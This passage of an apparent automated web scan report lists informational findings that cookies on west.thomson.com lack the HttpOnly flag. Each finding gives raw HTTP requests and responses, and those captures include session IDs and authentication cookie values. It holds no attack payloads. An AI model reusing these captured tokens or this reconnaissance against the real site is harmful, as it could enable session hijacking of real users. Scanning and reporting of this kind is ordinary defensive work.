Content-Type: text/html; charset=utf-8
Content-Length: 168

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/Error/500Error.aspx?aspxerrorpath=/store/DOTD.aspx">here</a>.</h2>
</body></html>

14.140. http://west.thomson.com/store/secure/ShoppingBasket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:24 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=5B554B6F6DD767F208B345EAA979222AFB75B1D39D5072C8AC8163224D602E4EA0791659ECC40EAA04995AD2414A1EF63E920C2406A52D5A77C772B7312571F0AAC96B34372DB47CEF38803A8D2B7154B70F6215558C4BE194B8F6631FFDBEECF7D4256904225BA30EA921CF83C914FF8CF103200841FE605F66B636573E74A9FE11E39E665181B5E833711454838B5B5EDDAB8E52F237C0742B8087456FDD46A9875A0BD3BE7D68841EDA7A916AA72ACAB0B687055A7BCB2C0B64F0382E8FCCEA3EEE09697283C17C482DF2DE2D55F26A8BD1E5F9CC9D2F12F213FCC63F2AE7AFD0ECCE; path=/
Set-Cookie: SbasketVw=T; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 107323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...

14.141. http://west.thomson.com/support/contact-us/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:34 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=89EA3F93E09614D9A098CCCF9C0F29D3204EE9663C01D51E95CD9C592CDADB23A34786B30EBABB2390E7FEA51BBE62180DADFAF255CA8AB719509015068D68C8075FE6A23F095DF549827C80033255DA36E699502293674B6D668FCAE278ADD04138D880C6A3F40E0EDE98A77853F1F1B45413E1BE2A34BEE937DCCCDA776CE1ABCED0F26FB69F2755769BB874466A73E9A83CADFE53A93539D3BD0332C48F697F141BAC00E38E27C2938518BE9D5C9648C952E2BEF872DC06486975DC27BFACFEF36294DEAF331A255D5995D5F54EF39A2AFCD97B20A7D318572959553AEEC610017BD6; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90651


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...

14.142. https://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /GlobalBackgroundStyles.5.1.421.22.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GlobalBackgroundStyles.5.1.421.22.ashx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=A67F8B510CDBD58F31C838E207550441CEB1CACBCF20772FABFD044A384585124BA1797DC696288EE75DD493FCDA4E346EC5188BF838DB30477D657A2B3353079A4A75CC7ADF7B32C6DFC8CFB3EE9A58DA7FA502513F8B57574483FBFFFB85B197C174609DEBF07D119AF640ED1BDE7FA911D2469C6D1F6E4CFA3E4CD98E5EDA89F130ADB2B2BB195DEF71DA3D31374DF57A62DF7A9EB3103E3E90B8657C457C5A7DBC308AB465C8B88F9F9BB15ECBD076348E09B023DFF9E2C2D12FFA4890F4C4A7A979AA2F883A180B60FA2CEEB1997ED8D19C4A177200624EEB34DD1B8E1517173999

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:16 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=31ACA283401DA17A05061FA0F538B8F86B7C65D5AB4A89A80E18F25BB77CEE40DB1033D80460E2C8E2A5472BD6CA74D385343046E024D8A9016A49A4B932722E3A8B6E13E322F378E10C55CE5C6D739F961129503F73317944D18CF6FC365195204B6B3DDC328162B313B90606D91909B6A1C8F543CA6E9896E8054786853477E91BF7A0F5CB5530F37A45203DF832D4841547B09AF64E9712AA65C817E0A78CBBD365CBD13686366C4F93CC55EB97CDAC4CE43C02380AC22DBB7C12A6CC859B899F5ADFFCC303480CB636B2447BED43ECFD31E730F41D8F75BCF8299C965EDBEDB25AD4; path=/
Cache-Control: private
Expires: Mon, 25 Jul 2011 03:24:16 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 4551

.Header_Org_SideBar1{background-image:url('https://images.west.thomson.com/organizations/headers/sidebar1.jpg');margin-top:2px;height:85px;width:241px}.Header_Org_SideBar2{background-image:url('https:
...[SNIP]...

14.143. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/Promotions/EmailPreferences/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:15 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=A85C2F3C93F050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69722


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

14.144. https://west.thomson.com/store/secure/EmptyBasket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/EmptyBasket.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/secure/EmptyBasket.aspx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=0D1C43F14C3D0360D4C56BDD0D49E3A1E347C13F76ADC1B282235271457FAC648FB37FE6B223762A24E6CB268609BC8463ECB71442613CE6C286443DD8C796AD188F8568D73785118A509021BEABBD4E55D10E5F1E3A4F4A3F1B558AB2332C44A56F489B0571AEA92276AE792D9D8761A0FBB7322D072015D4B719941EFD8FCB5CDB63E1CEF01EF859C876D1DA920B7EB3539BA4B4D934B5A3CF2F56BB805BA3F3435E9F173B50A3D9F7C34D0C8E7180A2F74BC8118F96769794F6D4C7A36DCE92EEA8FE38E72E95AF86A85ADB9338C9E73EDA3652910D79D1A7D57B6EF7422F00DB82A9

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:06:52 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=79CBDB991A6459338884A46B49D0105C145D63087A0F6EA1AF1008AF8F10A6BE20B4B11D124F705A3B3E14AC22EC73DD213F5F9EEB5214BC1762EE7929A0F454C61A0BDCF1DEC78E1A8885681779E756F6C33BB53E5D00DC20A327C71B7A18A01CD2DEC0CB430995B2D528EAE5EDE656A06490C12141D8DC1BDB52EA377E9C528F52835D9BB8C6526E44BC00F17481EEE8BAF4CEFD033D588FC1950953DF71D7BEC464ACA7CC296D962C2F89E8B7BF9E2164F2A2485B2AD03B442B72330D47CEE8F0DEFDB9FFFF7F71AE584B4FEA6F98140E539AF54249B185FB8811D025A5E2F4D81C75; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68662


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...

14.145. https://west.thomson.com/store/secure/ShippingInfo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/ShippingInfo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=9DFF38C2ED245A836B638A4FD2BB05048EFDFD2A3F3BC8DC4D0876357DAC06B163234E108A8F0DA6FFB919F8831205FF1893BF274F77770E9447A6CF6832F99911CAEA4F06343A555BDF7037EBDAD0392A3B821D6A252C115D9D10A1FD2B10DE395F8581D4BBE49B8B4EF6A088A00BE982BA5CBAAC1C23CD6D40E8E10C4A8CB90101D3CE531D7618D4A99EC6ED09D86A6A87BEB92C84EBB5541C5F4267CA16C317ED73CD9AD52E9BCFFCFA39E7A4F7561999EF701967F4FAEE3513AC9E115F783D6CA97286E2B3D06563DA39F267FA170B8C51C76EEB06DDD6F99A112D49B9ED48435EDE

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:45 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=C92933A45E8BBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...

14.146. https://west.thomson.com/store/secure/ShippingLocation.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/ShippingLocation.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/secure/ShippingLocation.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; c=undefined571422undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shopping%20Cart; s_sq=thwest%3D%2526pid%253DShopping%252520Cart%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Btry%25257Bctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524btnProceedBottomHideSub%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=FDCDD3CCDE1E864402B9FC99C17C5B887E4F142C7E539940508F9F7479A6A6F433A5B1298DA99CBBD01CC94400DE585D91C0BC2044A5DA3945B77A521C66DF4338A0F22A9AE831BC4D28B1B360FFA8BC5F7FEFCCCD8455667134A5A3C8102426B33E2E3C145412DD2FC7BAE2D1CF511058AF4AC6C8158E791D929260CFD17BFDF9A91806384EB9892622A5C4D4B2F99ACA7BB96849E4E1F35EDDBE997CF3F1A087FAD644670217520402D18C4C7DC1B3E409FCCFD1749D5356AF72C2DE92A54626B4737812FE5F26773127B302BF70BC002DA3B3EDC640107FA24DBEFD453411A2E9878D

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:04:30 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: https://west.thomson.com/store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=317228B45D05EAA4FDEA746AAC7BE43F8561B2A283AF9A5155875AD255B46C71677CBC8EA62E3B5CEE39AF7C22128258C3732C9D175B9FEACDC5F2E6FFE5693065611A01C05A38F1E5D84493B7967DC232D933B9102443C77BEF9BFF3E01C8CD15A6463509AC6370E2EC7A2CAB65CC2599C96298961A97FB8BF6C92BC20D040744C918ED8E0C8E71DAD17C3B61362A014C184546A8B80643B718BDEA4BE3456AA6D427C23674A519C4FBE32A9E223D084ADFF81BB8C05F51E37982CC1060BAA31A729FFE99953D24C027132FDB03700957643439D6CC8600B3DA1DBADB71D5F3DB402F3B; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 614

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://west.thomson.com/store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&amp;CartContents=220
...[SNIP]...

14.147. https://west.thomson.com/support/customer-service/order-info.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /support/customer-service/order-info.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/customer-service/order-info.aspx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
